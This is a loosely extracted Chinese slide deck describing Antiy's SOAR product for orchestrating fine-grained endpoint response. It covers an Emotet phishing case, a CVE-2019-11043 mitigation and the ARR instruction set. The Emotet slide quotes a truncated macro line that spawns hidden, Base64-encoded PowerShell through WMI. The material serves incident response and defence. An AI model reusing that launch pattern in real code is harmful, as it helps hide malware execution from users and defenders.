SOAR如何編排指引細(xì)粒度的端點處置

SOAR如何編排指引細(xì)粒度的端點處置威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗CONTENTS01面臨的挑戰(zhàn)02什么是SOAR03安天SOAR案例04安天SOAR架構(gòu)05安天SOAR特點威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗面臨的挑戰(zhàn)面臨的挑戰(zhàn)Page4威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗什么是SOAR什么是SOAR（通過與其它技術(shù)的集成）并自動執(zhí)行以達(dá)成預(yù)期結(jié)果，譬如分診管理，事件響應(yīng)，威脅情報，合規(guī)性管理和威脅獵捕。SOARaresolutionsthataddmachineassistancetohumansecurityoperatorsbytakinginputsfromtechnologies)andautomatedtoachieveadesiredoutcome,suchastriagemanagement,incidentresponders,threatintelligence,compliancemanagers,andthreathunting.來源：Page6威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗Page7安天對SOAR的認(rèn)知威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗安天SOAR案例1324案例一內(nèi)網(wǎng)Emotet傳播事件：攻擊過程還原1324應(yīng)急響應(yīng)人員排查后發(fā)現(xiàn)這是一起利用COVID-19為誘餌分發(fā)釣魚郵件傳播Emotet惡意代碼的安全DoWhileGetObject(winmgmtS:win32_Procreate("Powershell-whidden-enJABBAHAGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaMAZgBwAHMAbQA9ACcAUgBeQB2AGUAJwA7ACQARQBrAHgAaABsAA來源《利用疫情傳播Emotet銀行木馬攻擊事件梳理Page9威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗案例一內(nèi)網(wǎng)Emotet傳播事件：態(tài)勢感知系統(tǒng)威脅告警Page10威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗案例一內(nèi)網(wǎng)Emotet傳播事件：系統(tǒng)自動分析基于ATT&CK框架融合分析Page11威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗案例一內(nèi)網(wǎng)Emotet傳播事件：處置流程的精細(xì)化編排Page12威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗I案例一內(nèi)網(wǎng)Emotet傳播事件：處置流程的精細(xì)化編排Page13威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗Page14威脅框架：細(xì)粒度對抗案例一內(nèi)網(wǎng)Emotet傳播事件：處置腳本編輯器(4)、腳本(5)、其他(5+)等共25+種操作原語Page15安天ARR(AntiyResponseRule)開放式處置規(guī)則定義ARRARR（AntiyResponseRule）的部分指令集1.創(chuàng)建注冊表項/值[Reg_Create] 2.修改注冊表項/值[Reg_Modify] 3.刪除注冊表項/值[Reg_Delete] 4.重命名注冊表項/值[Reg_Rename]5.刪除注冊表值[Reg_Delete_Value]1.創(chuàng)建計劃任務(wù)[Task_Create]2.修改計劃任務(wù)[Task_Modify]3.刪除計劃任務(wù)[Task_Delete]1.創(chuàng)建文件[File_Create]2.修改文件[File_Modify]3.刪除文件[File_Delete]4.重命名文件[File_Rename]5.修改文件屬性[File_Attribute]6.刪除文件指定內(nèi)容[File_DelText]7.MBR修復(fù)[File_repairMbr]1.創(chuàng)建進(jìn)程[Proc_Create] 2.掛起/恢復(fù)進(jìn)程[Proc_Modify] 3.結(jié)束進(jìn)程[Proc_Terminate]4.掛起指定模塊線程[Proc_Module_Threads]1.下發(fā)bat腳本并運行[Script_Bat]2.下發(fā)shell腳本并運行[Script_Shell]3.下發(fā)vbs腳本并運行[Script_Vbs]4.下發(fā)powershell腳本并運行[Script_PWL]5.下載文件并運行[Script_File]1.外設(shè)彈出/規(guī)則[Other_Device]2.斷網(wǎng)處置[Other_NetOff]3.禁用端口[Other_Disabled_Port]3.禁用ip[Other_Disabled_Ip]4.補丁修復(fù)[Other_Fix_patch]5.創(chuàng)建互斥免疫[Other_Create_Mutex]6.創(chuàng)建掃描并自動處置[Other_QuickScan]二、計劃任務(wù)（可配自動處置規(guī)則）一、注冊表（可配自動處置規(guī)則）三、文件（可配自動處置規(guī)則）四、進(jìn)程（可配自動處置規(guī)則）五、腳本六、其他安天ARR開放式處置規(guī)則定義是安天為實現(xiàn)細(xì)粒度端點響應(yīng)策略而定義的一組指令集合，包括了對扇區(qū)、注冊表、文件、驅(qū)動、進(jìn)程等進(jìn)行相關(guān)操作的動作定義，并可以執(zhí)行包括磁盤遍歷，特征匹配搜索等邏輯動作?？梢杂糜谔幚聿呗跃幣拧⒛_本生成，以執(zhí)行細(xì)粒度的處置動作。安天SOAR提供ARR編輯器，并可以在部分場景中自動生成處置腳本供網(wǎng)管審核。ARR處置規(guī)則支持判定條件，用于觸發(fā)相應(yīng)處置:案例一內(nèi)網(wǎng)Emotet傳播事件：生成處置包置包派發(fā)至相關(guān)設(shè)備，并將操作記錄留存Page16威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗案例二CVE-2019-11043漏洞告警Page17威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗案例二CVE-2019-11043漏洞處置?根據(jù)資產(chǎn)所屬業(yè)務(wù)屬性選擇緩解措施緩解腳本?修改Nginx配置文件增加SecRuleREQUEST_URI\?重載NginxPage18威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗安天SOAR架構(gòu)Page20SOAR功能架構(gòu)終端探針流量探針網(wǎng)絡(luò)設(shè)備安全設(shè)備資產(chǎn)運維其他系統(tǒng)威脅情報上下文識別實體關(guān)聯(lián)事件歸類分析工具案件報告流程處理關(guān)聯(lián)分析劇本應(yīng)用線索管理效能評估AVLPK專殺統(tǒng)數(shù)據(jù)平臺場景劇本匹配劇本管理劇本驗證劇本審核加密簽名版本管理劇本庫驗證系統(tǒng)自動響應(yīng)核對資源管理指令集管理控制臺簽名驗證指令下發(fā)威脅情報上下文識別實體關(guān)聯(lián)事件歸類分析工具案件報告流程處理關(guān)聯(lián)分析劇本應(yīng)用線索管理效能評估AVLPK專殺統(tǒng)數(shù)據(jù)平臺場景劇本匹配劇本管理劇本驗證劇本審核加密簽名版本管理劇本庫驗證系統(tǒng)自動響應(yīng)核對資源管理指令集管理控制臺簽名驗證指令下發(fā)指令編輯指令編輯可視化編排腳本編譯Page21 威脅情報 態(tài)勢感知 SOAR部署結(jié)構(gòu) 威脅情報 態(tài)勢感知 威脅框架：細(xì)粒度對抗威脅框架：細(xì)粒度對抗安天SOAR特點安全運營能力特點安天SOAR的能力安全運營能力特點安全能力編排化效能可評估效果可驗證腳本編輯可視化關(guān)聯(lián)分析流程化響應(yīng)處置自動化Page24安天SOAR的價值統(tǒng)籌與協(xié)調(diào)智能化關(guān)聯(lián)智能化分析威脅行為體活動的上下文信息關(guān)聯(lián)匯總相似、相關(guān)事件統(tǒng)籌